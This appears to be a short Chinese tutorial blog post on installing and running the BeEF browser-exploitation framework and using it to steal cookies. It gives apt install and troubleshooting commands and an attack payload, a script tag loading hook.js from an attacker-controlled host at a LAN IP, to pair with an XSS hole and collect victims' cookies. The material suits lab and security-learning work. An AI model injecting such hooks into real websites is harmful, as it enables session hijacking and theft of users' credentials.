day07beef-xss之根据beef-xss获取cookies

guowu6662024-05-11 20:52

1.安装

bash 复制代码 
apt-get update
apt-get install beef-xss

若报错运行不了尝试

apt remove ruby

apt remove beef-xss

apt-get install ruby

apt-get install ruby-dev libpcap-dev

gem install eventmachine

apt-get install beef-xss

2.运行

bash 复制代码 
beef-xss

运行成功会自动弹出浏览框。

bash 复制代码 
攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ,在beef-xss查看结果。

发送指令获取cookies

相关推荐
文心快码BaiduComate7 分钟前
Comate搭载DeepSeek-V4
前端·后端
豹哥学前端9 分钟前
5分钟搞懂事件委托
前端·javascript·面试
Awu122714 分钟前
🍎把数学公式搬进 Web 表格:一个 VTable 实战案例
前端
江无行者16 分钟前
aly oss技能应用
前端
朝阳3923 分钟前
单向数据流
前端
小小小小宇25 分钟前
H5 嵌入微信 / 支付宝 / 抖音小程序 WebView:调用原生能力完整方案
前端
卷帘依旧27 分钟前
React中父子组件生命周期的执行顺序
前端
绝世唐门三哥31 分钟前
ES6 --- import/export 全解析
开发语言·前端·javascript
小杍随笔31 分钟前
【iNovel 前端架构深度解析:基于 Vue 3 + TypeScript + Tauri 的跨端小说写作工具】
前端·架构·typescript
yqcoder32 分钟前
JavaScript 异步基石:Promise 完全指南
开发语言·前端·javascript
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406AI科技热点日报 | 2026年5月11日07Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓08codex app每次打开重连5次Reconnecting问题解决09Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)10人工智能最新动态 AI 日报 · 2026年5月10日